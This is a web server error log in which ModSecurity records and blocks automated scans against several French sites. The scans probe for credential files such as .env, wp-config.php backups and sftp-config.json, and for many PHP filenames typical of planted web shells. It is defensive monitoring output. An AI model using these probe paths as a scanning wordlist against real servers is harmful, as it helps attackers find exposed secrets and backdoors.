[Mon May 11 11:32:14.573951 2026] [security2:error] [pid 1254179:tid 1254197] [client 185.177.72.9:38874] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/selenium/.env.staging_staging"] [unique_id "agGiHmS6k_SCYd1AVZqoMgAAARA"]
[Mon May 11 11:32:16.015281 2026] [security2:error] [pid 1254179:tid 1254197] [client 185.177.72.9:38874] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiHmS6k_SCYd1AVZqoMgAAARA"]
[Mon May 11 11:32:16.041850 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:38878] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /selenium/.env.staging_staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/selenium/.env.staging_staging"] [unique_id "agGiIEYQeUtAPynIs6xSAwAAAA4"]
[Mon May 11 11:32:16.042598 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:38878] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/selenium/.env.staging_staging"] [unique_id "agGiIEYQeUtAPynIs6xSAwAAAA4"]
[Mon May 11 11:32:18.289019 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:38878] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiIEYQeUtAPynIs6xSAwAAAA4"]
[Mon May 11 11:32:44.174907 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/moon.php
[Mon May 11 11:32:44.409183 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/a1.php
[Mon May 11 11:32:44.648075 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/ahax.php
[Mon May 11 11:32:44.886599 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/lite.php
[Mon May 11 11:32:45.612592 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/k.php
[Mon May 11 11:32:45.851127 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/leaf.php
[Mon May 11 11:32:46.085657 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/wp-conflg.php
[Mon May 11 11:32:46.508654 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/wp_filemanager.php
[Mon May 11 11:32:46.746680 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/pp.php
[Mon May 11 11:32:46.983676 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/index26.php
[Mon May 11 11:32:47.222127 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/12.php
[Mon May 11 11:32:47.946991 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/Marvins.php
[Mon May 11 11:32:48.284340 2026] [security2:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "manhattan-studio.fr"] [uri "/wp-config.php.backup"] [unique_id "agGiQERdw2n9wv6Ai48BTwAAAI0"]
[Mon May 11 11:32:48.284486 2026] [security2:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "manhattan-studio.fr"] [uri "/wp-config.php.backup"] [unique_id "agGiQERdw2n9wv6Ai48BTwAAAI0"]
[Mon May 11 11:32:48.284747 2026] [security2:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "manhattan-studio.fr"] [uri "/wp-config.php.backup"] [unique_id "agGiQERdw2n9wv6Ai48BTwAAAI0"]
[Mon May 11 11:32:48.528261 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/aa.php
[Mon May 11 11:32:48.997443 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/abcd.php
[Mon May 11 11:32:49.286189 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/a2.php
[Mon May 11 11:32:49.647577 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/wp-gr.php
[Mon May 11 11:32:50.084766 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/xynz1.php
[Mon May 11 11:32:50.338888 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/uqcxit7i.php
[Mon May 11 11:32:50.625748 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/display_info.php
[Mon May 11 11:32:50.923488 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/wp-config-disabled.php
[Mon May 11 11:32:51.216226 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/test_info.php
[Mon May 11 11:32:51.791253 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/spip.php
[Mon May 11 11:32:52.032485 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/wp-index.php
[Mon May 11 11:32:52.280590 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/php-nginx.php
[Mon May 11 11:32:52.519818 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/wp-config.test.php
[Mon May 11 11:32:53.103222 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/op.php
[Mon May 11 11:32:53.377124 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/mandrill.php
[Mon May 11 11:32:53.992747 2026] [security2:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "manhattan-studio.fr"] [uri "/backup.wp-config.php"] [unique_id "agGiRURdw2n9wv6Ai48BZAAAAI0"]
[Mon May 11 11:32:53.992901 2026] [security2:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "manhattan-studio.fr"] [uri "/backup.wp-config.php"] [unique_id "agGiRURdw2n9wv6Ai48BZAAAAI0"]
[Mon May 11 11:32:53.993144 2026] [security2:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "manhattan-studio.fr"] [uri "/backup.wp-config.php"] [unique_id "agGiRURdw2n9wv6Ai48BZAAAAI0"]
[Mon May 11 11:32:54.234003 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/20.php
[Mon May 11 11:32:54.467453 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/upload_file.php
[Mon May 11 11:32:55.162846 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/aws.settings.php
[Mon May 11 11:32:55.438509 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/payout.php
[Mon May 11 11:32:55.671289 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/pqr.php
[Mon May 11 11:32:57.092040 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/phpinfo.php
[Mon May 11 11:32:57.336619 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/tmp.php
[Mon May 11 11:32:57.572895 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/456.php
[Mon May 11 11:32:58.172982 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/new2.php
[Mon May 11 11:32:59.834961 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/server.php
[Mon May 11 11:33:00.071476 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/extension-info.php
[Mon May 11 11:33:00.359454 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/conn_test.php
[Mon May 11 11:33:00.601781 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/information.php
[Mon May 11 11:33:00.922669 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/credentials.php
[Mon May 11 11:33:01.175079 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/phphph.php
[Mon May 11 11:33:01.408107 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/test-cgi.php
[Mon May 11 11:33:01.744032 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/twin.php
[Mon May 11 11:33:02.542065 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/pi.php7
[Mon May 11 11:33:02.798722 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/display_phpinfo.php
[Mon May 11 11:33:03.031859 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/webserver-info.php
[Mon May 11 11:33:03.545364 2026] [security2:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "manhattan-studio.fr"] [uri "/new-wp-config.php"] [unique_id "agGiT0Rdw2n9wv6Ai48BfwAAAI0"]
[Mon May 11 11:33:03.545506 2026] [security2:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "manhattan-studio.fr"] [uri "/new-wp-config.php"] [unique_id "agGiT0Rdw2n9wv6Ai48BfwAAAI0"]
[Mon May 11 11:33:03.545762 2026] [security2:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "manhattan-studio.fr"] [uri "/new-wp-config.php"] [unique_id "agGiT0Rdw2n9wv6Ai48BfwAAAI0"]
[Mon May 11 11:33:04.113850 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/env-info.php
[Mon May 11 11:33:04.657581 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/moderator.php
[Mon May 11 11:33:04.895037 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/23.php
[Mon May 11 11:33:05.144208 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/summary.php
[Mon May 11 11:33:05.445869 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/globals.php
[Mon May 11 11:33:05.451056 2026] [security2:error] [pid 1254242:tid 1254256] [client 185.177.72.9:2702] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/sftp-config.json.dist"] [unique_id "agGiUb4KNmD_mZ_vlf8yngAAAEs"]
[Mon May 11 11:33:05.451464 2026] [security2:error] [pid 1254242:tid 1254256] [client 185.177.72.9:2702] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/sftp-config.json.dist"] [unique_id "agGiUb4KNmD_mZ_vlf8yngAAAEs"]
[Mon May 11 11:33:05.694366 2026] [:error] [pid 1254328:tid 1254344] [client 172.212.217.10:1331] File does not exist: /home/manhatta/public_html/evil.php
[Mon May 11 11:33:07.133185 2026] [security2:error] [pid 1254242:tid 1254256] [client 185.177.72.9:2702] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiUb4KNmD_mZ_vlf8yngAAAEs"]
[Mon May 11 11:33:07.163277 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:2716] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/sftp-config.json.dist"] [unique_id "agGiUxjZymfuKpjWXeh2CgAAANg"]
[Mon May 11 11:33:07.163508 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:2716] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/sftp-config.json.dist"] [unique_id "agGiUxjZymfuKpjWXeh2CgAAANg"]
[Mon May 11 11:33:09.156604 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:2716] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiUxjZymfuKpjWXeh2CgAAANg"]
[Mon May 11 11:33:09.184881 2026] [security2:error] [pid 1254179:tid 1254201] [client 185.177.72.9:2720] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json4"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/sftp-config.json4"] [unique_id "agGiVWS6k_SCYd1AVZqomwAAARQ"]
[Mon May 11 11:33:09.185489 2026] [security2:error] [pid 1254179:tid 1254201] [client 185.177.72.9:2720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/sftp-config.json4"] [unique_id "agGiVWS6k_SCYd1AVZqomwAAARQ"]
[Mon May 11 11:33:10.729512 2026] [security2:error] [pid 1254179:tid 1254201] [client 185.177.72.9:2720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiVWS6k_SCYd1AVZqomwAAARQ"]
[Mon May 11 11:33:10.755976 2026] [security2:error] [pid 1254179:tid 1254193] [client 185.177.72.9:2724] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json4"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/sftp-config.json4"] [unique_id "agGiVmS6k_SCYd1AVZqonAAAAQw"]
[Mon May 11 11:33:10.756416 2026] [security2:error] [pid 1254179:tid 1254193] [client 185.177.72.9:2724] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/sftp-config.json4"] [unique_id "agGiVmS6k_SCYd1AVZqonAAAAQw"]
[Mon May 11 11:33:11.998670 2026] [security2:error] [pid 1254179:tid 1254193] [client 185.177.72.9:2724] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiVmS6k_SCYd1AVZqonAAAAQw"]
[Mon May 11 11:33:12.025274 2026] [security2:error] [pid 1254133:tid 1254157] [client 185.177.72.9:2728] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json5"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/sftp-config.json5"] [unique_id "agGiWBjZymfuKpjWXeh2DQAAANU"]
[Mon May 11 11:33:12.026025 2026] [security2:error] [pid 1254133:tid 1254157] [client 185.177.72.9:2728] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/sftp-config.json5"] [unique_id "agGiWBjZymfuKpjWXeh2DQAAANU"]
